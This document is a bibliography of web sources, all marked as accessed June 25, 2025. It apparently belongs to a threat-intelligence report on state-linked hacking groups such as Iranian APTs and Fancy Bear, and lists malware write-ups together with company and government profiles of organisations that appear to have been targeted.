The Hidden Front: Iran, Cyber Warfare, and the Looming Threat to U.S. Critical Infrastructure, accessed June 25, 2025, https://www.cyberdefensemagazine.com/the-hidden-front-iran-cyber-warfare-and-the-looming-threat-to-u-s-critical-infrastructure/
Cybercriminals are Targeting Elections in India with … – Resecurity, accessed June 25, 2025, https://www.resecurity.com/blog/article/cybercriminals-are-targeting-elections-in-india-with-influence-campaigns
Inside the Shadows: Understanding Active Iranian APT Groups, accessed June 25, 2025, https://www.picussecurity.com/resource/blog/understanding-active-iranian-apt-groups
Fancy Bear spearphishing exploiting CVE-2024-11182 to deliver SpyPress – Broadcom Inc., accessed June 25, 2025, https://www.broadcom.com/support/security-center/protection-bulletin/fancy-bear-spearphishing-exploiting-cve-2024-11182-to-deliver-spypress
puNK-003 (Threat Actor) – Malpedia, accessed June 25, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/punk-003
GCMAN (Threat Actor) – Malpedia, accessed June 25, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/gcman
Informatika a.d. – Automation, Information Technology Company …, accessed June 25, 2025, https://www.bouncewatch.com/explore/startup/informatika-ad
Sport Vision Group Company Overview, Contact Details & Competitors | LeadIQ, accessed June 25, 2025, https://leadiq.com/c/sport-vision-group/5a1d95f8230000540084940b
SPORT VISION – CORE SA, accessed June 25, 2025, https://core-sa.com/client/sport-vision/
Supply Chain Data Of Sumber Rezeki Areca Company Profile | Trademo, accessed June 25, 2025, https://www.trademo.com/companies/sumber-rezeki-areca/29602058
Cv. Berkat Sumber Rezeki from Indonesia – Freshdi, accessed June 25, 2025, https://freshdi.com/supplier/Cv-Berkat-Sumber-Rezeki
BIZOUK.COM Logo & Brand Assets (SVG, PNG and … – Brandfetch, accessed June 25, 2025, https://brandfetch.com/bizouk.com
THREAT ALERT: DarkGate [BLOG PDF] – Cybereason, accessed June 25, 2025, https://www.cybereason.com/hubfs/dam/collateral/reports/darkgate-threat-alert.pdf
TIM Brasil – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/TIM_Brasil
Corporate Profile – Telefônica RI, accessed June 25, 2025, https://ri.telefonica.com.br/en/the-company/corporate-profile/
pressclubofindia.org, accessed June 25, 2025, https://pressclubofindia.org/about/
Cybersecurity Best Practices | Cybersecurity and Infrastructure Security Agency CISA, accessed June 25, 2025, https://www.cisa.gov/topics/cybersecurity-best-practices
Dmitry Volkov | Group-IB Author, accessed June 25, 2025, https://www.group-ib.com/author/dmitry-volkov/
א.ל.כרסומטל זיווד בע”מ, accessed June 25, 2025, http://alkarso.co.il/
CARSOMETAL LTD., Electronic Encasements in KIRYAT ATTA – dun’sguide – דנסגייד, accessed June 25, 2025, https://www.dunsguide.co.il/en/C90880c0eba10ac11ebc16b3e90004476_carsometal/
to. Kersometal Packaging Ltd. / A.L. KARSOMETAL EQUIPMENT LTD – 514345255 – CheckId, accessed June 25, 2025, https://en.checkid.co.il/company/A.L.+KARSOMETAL+EQUIPMENT+LTD-YeE3rPo-514345255
Equipment and instrumentation – B.Z.M.T. Technology & Engineering Ltd., accessed June 25, 2025, https://www.bzmt-technology.com/Equipment-and-instrumentation/
Toronto – NADRA Services – Consulate General of Pakistan, accessed June 25, 2025, https://www.pakconsulate.ca/nadra
NADRA ID cards – Pakistan Embassy SE, accessed June 25, 2025, https://pakistanembassy.se/nicop-cnic-poc/
Bank Banten | Golden, accessed June 25, 2025, https://golden.com/wiki/Bank_Banten-K3D4BAJ
Backdoor:Java/Jacksbot.B threat description – Microsoft Security …, accessed June 25, 2025, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Java/Jacksbot.B&threatId=-2147298833
Iranian ‘cyber actors’ pose threat amid conflict with Israel – WPLG, accessed June 25, 2025, https://www.local10.com/news/local/2025/06/19/iranian-cyber-actors-pose-threat-amid-conflict-with-israel/
Defense Visual Information Distribution Service – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Defense_Visual_Information_Distribution_Service
SSI Securities Company Details – Investing.com India, accessed June 25, 2025, https://in.investing.com/equities/saigon-securities-incorporation-company-profile
Overview – SSI, accessed June 25, 2025, https://www.ssi.com.vn/en/about-ssi/Overview
Ministry of National Defense (Taiwan) – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Ministry_of_National_Defense_(Taiwan)
Defense minister meets US officials – Taipei Times, accessed June 25, 2025, https://www.taipeitimes.com/News/taiwan/archives/2025/06/19/2003838876
Israel Defense Forces – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Israel_Defense_Forces
Bank Melli Iran – 2025 Company Profile & Competitors – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/bank-melli-iran/__8LEC3E6hJsxapLYw2_JjfOIMshqr7NnzyVhsuVFM_aQ
Disdukcapil Enrekang, accessed June 25, 2025, https://disdukcapilenrekang.com/
STRUKTUR ORGANISASI | Dinas Kependudukan dan Pencatatan Sipil – WordPress.com, accessed June 25, 2025, https://dukcapil.wordpress.com/struktur-organisasi/
Bridging-Inclusion-_-Understanding-Vulnerability-in-Indonesias-CRVS-System.pdf – puskapa, accessed June 25, 2025, https://puskapa.org/assets/uploads/2021/09/Bridging-Inclusion-_-Understanding-Vulnerability-in-Indonesias-CRVS-System.pdf
4 Main Threat Actor Types Explained for Better Proactive Defense – Recorded Future, accessed June 25, 2025, https://www.recordedfuture.com/threat-intelligence-101/threat-actors/threat-actor-types
Spotify – 2025 Company Profile, Team, Funding, Competitors & Financials – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/spotify/__Ca_zlUgx_WLZhdMnrFT5gl0QhuYKmazqhoU9ekDPRkw
Spotify – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Spotify
Bybit history – Regulated United Europe, accessed June 25, 2025, https://rue.ee/blog/bybit-history/
About Mengly J. Quach Education, accessed June 25, 2025, https://mjqeducation.edu.kh/about-mengly-j–quach-education
Upstox 2025 Company Profile: Valuation, Funding & Investors | PitchBook, accessed June 25, 2025, https://pitchbook.com/profiles/company/108750-70
Upstox | Overview, Mission, Vision, Values, Principles – workat.tech, accessed June 25, 2025, https://workat.tech/company/upstox
Kleinanzeigen – 2025 Company Profile & Competitors – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/kleinanzeigen/__lYxHIJtDKccquPkDAz-5M0UORd5mFHyCehkwbGwQCxQ
Fling (social network) – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Fling_(social_network)
Constitutional Court of Indonesia – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Constitutional_Court_of_Indonesia
Dubsmash – 2025 Company Profile, Funding & Competitors – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/dubsmash/__NqQ7Jj1fKum4egOx-6hXOvMXu7Uq7uRb5b80rTN4NXU
UIN Siber Syekh Nurjati Cirebon, accessed June 25, 2025, https://uinssc.ac.id/
Company Profile IAIN Syekh Nurjati Cirebon – YouTube, accessed June 25, 2025, https://www.youtube.com/watch?v=ItyDCY6yyJ4
Profile – Maca – Perpustakaan UIN Siber Syekh Nurjati Cirebon, accessed June 25, 2025, https://perpustakaan.uinssc.ac.id/profile-2/
Central Java – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Central_Java
Report: Kraken Business Breakdown & Founding Story | Contrary …, accessed June 25, 2025, https://research.contrary.com/company/kraken#:~:text=Kraken%20is%20a%20global%20cryptocurrency,costs%20for%20high%2Dvolume%20trades.
PA Kuala Kurun: Welcome to |, accessed June 25, 2025, https://pa-kualakurun.go.id/
bab iii profil pengadilan agama krui lampung barat, accessed June 25, 2025, https://repository.uinib.ac.id/17462/2/Alfi%20Syahputra%20NIM%201813010051%20BAB%20III.pdf
We Are Redwood – Redwood Software, accessed June 25, 2025, https://www.redwood.com/about-us/
www.kdl-logistics.com, accessed June 25, 2025, https://www.kdl-logistics.com/en/
K.A.L.A.D. & CO LTD overview – Find and update company information – GOV.UK, accessed June 25, 2025, https://find-and-update.company-information.service.gov.uk/company/09481642